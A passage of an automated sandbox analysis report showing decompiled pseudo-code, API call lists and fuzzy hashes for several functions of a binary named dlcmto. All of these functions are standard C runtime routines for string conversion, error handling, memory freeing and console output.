				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E011986B8(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E011986B8(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E01196E65(GetLastError());
									_t19 =  *((intOrPtr*)(E01196E3F(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E011978A0(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E01196E65(GetLastError());
						return  *((intOrPtr*)(E01196E3F(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E011978A0(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E01197869(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                          0x01197b84
                                          0x01197b89
                                          0x01197ba7
                                          0x01197ba9
                                          0x01197bac
                                          0x01197bd9
                                          0x01197be1
                                          0x01197be3
                                          0x01197bfc
                                          0x01197bff
                                          0x01197c02
                                          0x01197c10
                                          0x01197c1f
                                          0x01197c27
                                          0x01197c29
                                          0x01197c42
                                          0x01197c45
                                          0x01197c45
                                          0x01197c2b
                                          0x01197c32
                                          0x01197c3d
                                          0x01197c3d
                                          0x01197c47
                                          0x00000000
                                          0x01197c47
                                          0x01197c07
                                          0x01197c0c
                                          0x01197c0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197c0e
                                          0x01197bec
                                          0x00000000
                                          0x01197bf7
                                          0x01197bae
                                          0x01197bb1
                                          0x01197bb4
                                          0x01197bc7
                                          0x01197bca
                                          0x01197b9d
                                          0x01197b9d
                                          0x00000000
                                          0x01197ba0
                                          0x01197bba
                                          0x01197bbf
                                          0x01197bc1
                                          0x01197c4b
                                          0x01197c4b
                                          0x00000000
                                          0x01197bc1
                                          0x01197b8b
                                          0x01197b90
                                          0x01197b95
                                          0x01197b97
                                          0x01197b9a
                                          0x00000000

                                          APIs
                                            • Part of subcall function 01197869: _free.LIBCMT ref: 01197877
                                            • Part of subcall function 011986B8: WideCharToMultiByte.KERNEL32(?,00000000,01196BBD,00000000,00000001,01196CD1,0119AC31,?,01196BBD,?,00000000,?,0119B3ED,0000FDE9,00000000,?), ref: 0119875A
                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,01197EF1,?,?,?,00000000), ref: 01197BE5
                                          • __dosmaperr.LIBCMT ref: 01197BEC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,01197EF1,?), ref: 01197C2B
                                          • __dosmaperr.LIBCMT ref: 01197C32
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: 585819088e5ab273703aa041535432fc932e6097d8ee019b0e8a71ed6d5e9950
                                          • Instruction ID: becde46ec15d6b56298055e59c5e3de5f78017a5ad4182b91ae5c6b47d2f1892
                                          • Opcode Fuzzy Hash: 585819088e5ab273703aa041535432fc932e6097d8ee019b0e8a71ed6d5e9950
                                          • Instruction Fuzzy Hash: 18219572614217AFDF2DAF69CC80C2BB7ADEF456687118528F93997180E731EC418FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011980CF Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011980CF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E011986B8(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E011986B8(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E01196E65(GetLastError());
									_t17 =  *((intOrPtr*)(E01196E3F(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E01198094(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E01196E65(GetLastError());
						_t17 =  *((intOrPtr*)(E01196E3F(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E01198094(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E011980BB(_a8);
				return 0;
			}









                                          0x011980d5
                                          0x011980da
                                          0x011980ee
                                          0x011980f1
                                          0x01198123
                                          0x0119812b
                                          0x0119812d
                                          0x01198146
                                          0x01198149
                                          0x0119814c
                                          0x0119815a
                                          0x01198169
                                          0x01198171
                                          0x01198173
                                          0x0119818c
                                          0x0119818f
                                          0x0119818f
                                          0x01198175
                                          0x0119817c
                                          0x01198187
                                          0x01198187
                                          0x01198191
                                          0x01198192
                                          0x00000000
                                          0x01198192
                                          0x01198151
                                          0x01198156
                                          0x01198158
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01198158
                                          0x01198136
                                          0x01198141
                                          0x00000000
                                          0x01198141
                                          0x011980f3
                                          0x011980f6
                                          0x011980f9
                                          0x0119810c
                                          0x0119810f
                                          0x01198111
                                          0x01198113
                                          0x00000000
                                          0x01198113
                                          0x011980ff
                                          0x01198104
                                          0x01198106
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01198106
                                          0x011980df
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a11b9126a4c63e6021ebf7c9d72dd3ebee4766fe5d3f2f2f6239d404bfe84a39
                                          • Instruction ID: 04a4bf0d11a426a5012b0f8fe92797d7f6eb31edc00057040b2aef147191e664
                                          • Opcode Fuzzy Hash: a11b9126a4c63e6021ebf7c9d72dd3ebee4766fe5d3f2f2f6239d404bfe84a39
                                          • Instruction Fuzzy Hash: 7B21A1B120421EAFDF2DAF79DC80C6B77ADAF422687058534F63997141EB31EC4187A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011954CF Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E011954CF(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x11a7230; // 0xffffffff
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E011950C1(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E011971A3(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E011950C1(__eflags,  *0x11a7230, _t51);
							if(__eflags != 0) {
								E01195747(_t51, 0x11a9688);
								E011963FE(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E011950C1(__eflags,  *0x11a7230, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E011950C1(0,  *0x11a7230, 0);
							_push(0);
							L9:
							E011963FE();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E01195082(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x11a7230; // 0xffffffff
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E01194A08(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x11a7230; // 0xffffffff
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E011950C1(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E011971A3(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E011950C1(__eflags,  *0x11a7230, _t60);
								if(__eflags != 0) {
									E01195747(_t60, 0x11a9688);
									E011963FE(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E011950C1(__eflags,  *0x11a7230, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E011950C1(__eflags,  *0x11a7230, _t20);
								_push(_t60);
								L25:
								E011963FE();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E01195082(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x11a7230; // 0xffffffff
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E01194A08(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x11a7230; // 0xffffffff
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E011950C1(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E011971A3(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E011950C1(__eflags,  *0x11a7230, _t54);
											if(__eflags != 0) {
												E01195747(_t54, 0x11a9688);
												E011963FE(0);
												goto L45;
											} else {
												_t40 = 0;
												E011950C1(__eflags,  *0x11a7230, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E011950C1(0,  *0x11a7230, 0);
											_push(0);
											L41:
											E011963FE();
											goto L36;
										}
									}
								} else {
									_t54 = E01195082(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x11a7230; // 0xffffffff
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}























                                          0x011954cf
                                          0x011954cf
                                          0x011954da
                                          0x011954dc
                                          0x011954e1
                                          0x011954e4
                                          0x01195502
                                          0x01195505
                                          0x0119550a
                                          0x0119550c
                                          0x00000000
                                          0x0119550e
                                          0x0119551a
                                          0x0119551d
                                          0x0119551e
                                          0x01195520
                                          0x01195545
                                          0x01195547
                                          0x01195560
                                          0x01195567
                                          0x0119556c
                                          0x00000000
                                          0x01195549
                                          0x01195549
                                          0x01195552
                                          0x01195557
                                          0x00000000
                                          0x01195557
                                          0x01195522
                                          0x01195522
                                          0x01195522
                                          0x0119552b
                                          0x01195530
                                          0x01195531
                                          0x01195531
                                          0x01195536
                                          0x00000000
                                          0x01195536
                                          0x01195520
                                          0x011954e6
                                          0x011954ec
                                          0x011954f0
                                          0x011954fd
                                          0x00000000
                                          0x011954f2
                                          0x011954f5
                                          0x0119556f
                                          0x0119556f
                                          0x011954f7
                                          0x011954f7
                                          0x011954f7
                                          0x011954f9
                                          0x011954f9
                                          0x011954f9
                                          0x011954f5
                                          0x011954f0
                                          0x01195572
                                          0x0119557a
                                          0x0119557c
                                          0x0119557e
                                          0x01195586
                                          0x0119558b
                                          0x0119558c
                                          0x01195591
                                          0x01195592
                                          0x01195595
                                          0x011955af
                                          0x011955b2
                                          0x011955b7
                                          0x011955b9
                                          0x00000000
                                          0x011955bb
                                          0x011955c7
                                          0x011955ca
                                          0x011955cb
                                          0x011955cd
                                          0x011955f0
                                          0x011955f2
                                          0x01195609
                                          0x01195610
                                          0x01195615
                                          0x00000000
                                          0x011955f4
                                          0x011955fb
                                          0x01195600
                                          0x00000000
                                          0x01195600
                                          0x011955cf
                                          0x011955d6
                                          0x011955db
                                          0x011955dc
                                          0x011955dc
                                          0x011955e1
                                          0x00000000
                                          0x011955e1
                                          0x011955cd
                                          0x01195597
                                          0x0119559d
                                          0x0119559f
                                          0x011955a1
                                          0x011955aa
                                          0x00000000
                                          0x011955a3
                                          0x011955a3
                                          0x011955a6
                                          0x01195620
                                          0x01195620
                                          0x01195625
                                          0x01195628
                                          0x01195629
                                          0x0119562a
                                          0x01195631
                                          0x01195633
                                          0x01195638
                                          0x0119563b
                                          0x01195659
                                          0x0119565c
                                          0x01195661
                                          0x01195663
                                          0x00000000
                                          0x01195665
                                          0x01195671
                                          0x01195675
                                          0x01195677
                                          0x0119569c
                                          0x0119569e
                                          0x011956b7
                                          0x011956be
                                          0x00000000
                                          0x011956a0
                                          0x011956a0
                                          0x011956a9
                                          0x011956ae
                                          0x00000000
                                          0x011956ae
                                          0x01195679
                                          0x01195679
                                          0x01195679
                                          0x01195682
                                          0x01195687
                                          0x01195688
                                          0x01195688
                                          0x00000000
                                          0x0119568d
                                          0x01195677
                                          0x0119563d
                                          0x01195643
                                          0x01195645
                                          0x01195647
                                          0x01195654
                                          0x00000000
                                          0x01195649
                                          0x01195649
                                          0x0119564c
                                          0x011956c6
                                          0x011956c6
                                          0x0119564e
                                          0x0119564e
                                          0x0119564e
                                          0x0119564e
                                          0x01195650
                                          0x01195650
                                          0x01195650
                                          0x0119564c
                                          0x01195647
                                          0x011956c9
                                          0x011956d1
                                          0x011956d3
                                          0x011956d3
                                          0x011956da
                                          0x011955a8
                                          0x01195618
                                          0x01195618
                                          0x0119561a
                                          0x00000000
                                          0x0119561c
                                          0x0119561f
                                          0x0119561f
                                          0x0119561a
                                          0x011955a6
                                          0x011955a1
                                          0x01195580
                                          0x01195585
                                          0x01195585

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,0119AD22,?,00000001,01196BBD,?,0119ABA6,00000001,?,?,?,01196CD1,?,?), ref: 011954D4
                                          • _free.LIBCMT ref: 01195531
                                          • _free.LIBCMT ref: 01195567
                                          • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,0119ABA6,00000001,?,?,?,01196CD1,?,?,?,011A5F70,0000002C,01196BBD), ref: 01195572
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: e10e55069768f289297a5cc34cf092c5e61a704663e712d1d9b02c9aedb7c546
                                          • Instruction ID: f4b6f06b4d1189f4d4ad7d23cf5839e50f94e6069b1d722aade157db8a49c9ff
                                          • Opcode Fuzzy Hash: e10e55069768f289297a5cc34cf092c5e61a704663e712d1d9b02c9aedb7c546
                                          • Instruction Fuzzy Hash: 3B110A316052026BBFAF267CAC84D2A395B9FD167DF690137F635F31C1DF21894142A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01195626 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E01195626(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x11a7230; // 0xffffffff
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E011950C1(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E011971A3(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E011950C1(__eflags,  *0x11a7230, _t18);
							if(__eflags != 0) {
								E01195747(_t18, 0x11a9688);
								E011963FE(0);
								goto L13;
							} else {
								_t13 = 0;
								E011950C1(__eflags,  *0x11a7230, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E011950C1(0,  *0x11a7230, 0);
							_push(0);
							L9:
							E011963FE();
							goto L4;
						}
					}
				} else {
					_t18 = E01195082(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x11a7230; // 0xffffffff
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                          0x01195631
                                          0x01195633
                                          0x01195638
                                          0x0119563b
                                          0x01195659
                                          0x0119565c
                                          0x01195661
                                          0x01195663
                                          0x00000000
                                          0x01195665
                                          0x01195671
                                          0x01195675
                                          0x01195677
                                          0x0119569c
                                          0x0119569e
                                          0x011956b7
                                          0x011956be
                                          0x00000000
                                          0x011956a0
                                          0x011956a0
                                          0x011956a9
                                          0x011956ae
                                          0x00000000
                                          0x011956ae
                                          0x01195679
                                          0x01195679
                                          0x01195679
                                          0x01195682
                                          0x01195687
                                          0x01195688
                                          0x01195688
                                          0x00000000
                                          0x0119568d
                                          0x01195677
                                          0x0119563d
                                          0x01195643
                                          0x01195647
                                          0x01195654
                                          0x00000000
                                          0x01195649
                                          0x0119564c
                                          0x011956c6
                                          0x011956c6
                                          0x0119564e
                                          0x0119564e
                                          0x0119564e
                                          0x01195650
                                          0x01195650
                                          0x01195650
                                          0x0119564c
                                          0x01195647
                                          0x011956c9
                                          0x011956d1
                                          0x011956da

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,01196E44,0119BDEE,?,01198694,?,00000004,00000000,?,?,?,011934C6,?,00000000), ref: 0119562B
                                          • _free.LIBCMT ref: 01195688
                                          • _free.LIBCMT ref: 011956BE
                                          • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,01198694,?,00000004,00000000,?,?,?,011934C6,?,00000000,00000004), ref: 011956C9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 80a9ff7a410fd7a0824366202e636963df5b2b6991b718d19b86f5e1a6b484cb
                                          • Instruction ID: 4bc93dbcd58796c54e86ae0b9f7f29a9fba42c0f9c65125cb51fcce27f621158
                                          • Opcode Fuzzy Hash: 80a9ff7a410fd7a0824366202e636963df5b2b6991b718d19b86f5e1a6b484cb
                                          • Instruction Fuzzy Hash: 1D11C6326152023BAFAF2578BC80E6A2A5B9BD167CF650237F234B61C0DF61884182E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119D8D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119D8D9(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x11a7aa0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0119D94D();
					E0119D92E();
					_t13 = WriteConsoleW( *0x11a7aa0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                          0x0119d8f6
                                          0x0119d8fa
                                          0x0119d907
                                          0x0119d90c
                                          0x0119d927
                                          0x0119d927
                                          0x0119d92d

                                          APIs
                                          • WriteConsoleW.KERNEL32(?,?,01196BBD,00000000,?,?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001), ref: 0119D8F0
                                          • GetLastError.KERNEL32(?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001,00000000,00000001,?,0119ABCA,01196CD1), ref: 0119D8FC
                                            • Part of subcall function 0119D94D: CloseHandle.KERNEL32(FFFFFFFE,0119D90C,?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001,00000000,00000001), ref: 0119D95D
                                          • ___initconout.LIBCMT ref: 0119D90C
                                            • Part of subcall function 0119D92E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0119D8CA,0119CEEE,00000001,?,0119B134,00000000,?,00000001,00000000), ref: 0119D941
                                          • WriteConsoleW.KERNEL32(?,?,01196BBD,00000000,?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001,00000000), ref: 0119D921
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 7c58e969315ab9f02fc363f174329837c16e50f57e20f91b5bf61f779c447519
                                          • Instruction ID: 1b14f632a4c65b2dfba7913fec9d4cf570d7614a5a7a2d92b7dd9385f9673f27
                                          • Opcode Fuzzy Hash: 7c58e969315ab9f02fc363f174329837c16e50f57e20f91b5bf61f779c447519
                                          • Instruction Fuzzy Hash: 71F01C36505219BFCF2A2FD5EC04A9A3F67EB092A0F484020FA2985120E73289A0DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01192AA7 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01192AA7() {

				E011963FE( *0x11a9698);
				 *0x11a9698 = 0;
				E011963FE( *0x11a969c);
				 *0x11a969c = 0;
				E011963FE( *0x11a9044);
				 *0x11a9044 = 0;
				E011963FE( *0x11a9048);
				 *0x11a9048 = 0;
				return 1;
			}



                                          0x01192ab0
                                          0x01192abd
                                          0x01192ac3
                                          0x01192ace
                                          0x01192ad4
                                          0x01192adf
                                          0x01192ae5
                                          0x01192aed
                                          0x01192af6

                                          APIs
                                          • _free.LIBCMT ref: 01192AB0
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01192AC3
                                          • _free.LIBCMT ref: 01192AD4
                                          • _free.LIBCMT ref: 01192AE5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297853710.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000003.00000002.297834384.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297890450.00000000011A7000.00000008.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000003.00000002.297897661.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 514e92bf525e395d697a6f645367e447cddf58acf877f824b750d9e0440e921c
                                          • Instruction ID: 5e36955ffbc6bef8551d5e35adb6c96a4427a88acb228ec5ed816f653461a721
                                          • Opcode Fuzzy Hash: 514e92bf525e395d697a6f645367e447cddf58acf877f824b750d9e0440e921c
                                          • Instruction Fuzzy Hash: 70E0E67145512DBBDF3D6F14B6004C53E66EB9865C7C50035E47C56219CB3906E2DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%